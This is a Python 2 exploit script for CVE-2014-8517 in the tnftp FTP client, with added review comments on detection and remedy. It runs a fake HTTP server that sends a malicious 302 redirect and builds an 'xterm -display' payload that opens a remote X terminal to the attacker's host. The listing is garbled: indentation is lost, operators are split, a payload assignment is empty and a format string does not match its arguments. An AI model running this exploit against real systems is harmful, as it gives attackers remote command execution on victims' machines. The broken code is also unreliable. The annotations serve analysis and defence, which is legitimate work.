import os
import sys
import time
import socket
def usage():
    """Print the script banner followed by the expected arguments.

    The three positional arguments shown are the address and port placed
    in the HTTP redirect, and the address of the X display the payload
    command points at. The second usage line is a sample invocation.
    """
    prog = sys.argv[0]
    banner_lines = (
        "CVE-2014-8517 tnftp exploit",
        "by dash@hack4.org in 29 Nov 2014",
        "",
        "%s <redirect ip> <redirect port> <reverse xterm ip>" % (prog),
        "%s 192.168.1.1 81 192.168.2.1" % (prog),
    )
    # Python 2 print statement, as in the rest of the file.
    for line in banner_lines:
        print line
def webserveRedirect(redirect):
    """Answer the first TCP client on port 80 with the prepared response.

    Binds to all interfaces on port 80 (the reason the script body insists
    on uid 0), waits for a single connection, writes ``redirect`` to it and
    shuts the listener down. Always returns 0.

    From a detection point of view this is not a real HTTP server: it sends
    its reply as soon as a client connects, without reading the request,
    and serves exactly one connection.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    bind_addr = ("0.0.0.0", 80)
    listener.bind(bind_addr)
    listener.listen(3)
    # accept() blocks until one client connects; nobody else is served.
    conn, peer = listener.accept()
    print "[+] Sending redirect :>"
    conn.send(redirect)
    # Only the listening socket is closed; the accepted connection is not
    # closed explicitly.
    listener.close()
    return 0
def deliverUgga(owned):
    """Answer the first TCP client on the redirect port with ``owned``.

    Same one-shot pattern as webserveRedirect, but the port is the
    module-level ``rport`` that the script body parses from the command
    line, so this function only works after that assignment has run.
    The reply is written without reading anything from the client.
    Always returns 0.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # rport is a global set by the script body, not a parameter.
    bind_addr = ("0.0.0.0", rport)
    listener.bind(bind_addr)
    listener.listen(3)
    conn, peer = listener.accept()
    print "[+] Deliver some content (shell is spwaned now)"
    conn.send(owned)
    # Only the listening socket is closed; the accepted connection is not
    # closed explicitly.
    listener.close()
    return 0
# Script body: checks privileges and arguments, builds the HTTP response,
# then forks one process per listener (deliverUgga and webserveRedirect).
#
# NOTE(review): this listing lost its indentation in extraction, and some
# operators are split (`! =`, `= =`). The code is left exactly as found; the
# nesting of the fork/wait section at the end cannot be recovered with
# certainty from this copy.
#
# Defensive context: CVE-2014-8517 affects the tnftp client when it follows
# an HTTP redirect and takes the local output name from the redirect target.
# The remedy is a patched tnftp/ftp client; giving an explicit output file
# with -o avoids taking the local name from a server-controlled URL
# (verify against the vendor advisory for the platform in question).

# NOTE(review): the right-hand side of this assignment is missing in this
# copy, so the content that deliverUgga sends is not shown.
owned =
# Binding port 80 requires root, hence the uid check.
if (os.getuid())! = 0 :
print "[-] Sorry, you need root to bind port 80!"
sys.exit( 1 )
# NOTE(review): the check is `< 3`, but sys.argv[ 3 ] is read below, so an
# invocation with only two arguments passes this check and then fails with
# IndexError instead of printing the usage text.
if len (sys.argv)< 3 :
usage()
sys.exit( 1 )
# rip/rport: host and port handed to the redirect; rport is also the port
# deliverUgga binds. revip: host of the X display named in the command.
rip = sys.argv[ 1 ]
rport = int (sys.argv[ 2 ])
revip = sys.argv[ 3 ]
print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
# `Xnest -ac` starts a nested X server with access control disabled on
# display :1. An outbound X11 connection from a client host to an untrusted
# address (display :1 is conventionally TCP 6001) is therefore a useful
# network indicator for this technique.
print "[+] Dont forget to run Xnest -ac :1"
cmd = "xterm -display %s:1" % (revip)
# Spaces are percent-encoded so the command can travel inside a URL.
cmd = cmd.replace( " " , "%20" )
print "[+] Payload: [%s]" % cmd
# NOTE(review): three values are passed to the % operator, but the visible
# string has no matching placeholders, so part of the response text
# (presumably a header carrying them) appears to be missing from this copy.
# As written, this expression raises TypeError.
redirect = "HTTP/1.1 302\r\n" \
"Content-Type: text/html\r\n" \
"Connection: keep-alive\r\n" \
"\r\n\r\n" % (rip,rport,cmd)
# First fork: the child (fork() returned 0) runs the listener on rport.
uggapid = os.fork()
if uggapid = = 0 :
uggapid = os.getpid()
deliverUgga(owned)
else :
# Second fork: this child runs the port-80 listener.
webpid = os.fork()
if webpid = = 0 :
webpid = os.getpid()
webserveRedirect(redirect)
# Wait for both listener processes. The bare `except` swallows every error
# from waitpid, including a NameError if webpid was never assigned in the
# process that reaches this point.
try :
os.waitpid(webpid, 0 )
except :
pass
try :
os.waitpid(uggapid, 0 )
except :
pass
time.sleep( 5 )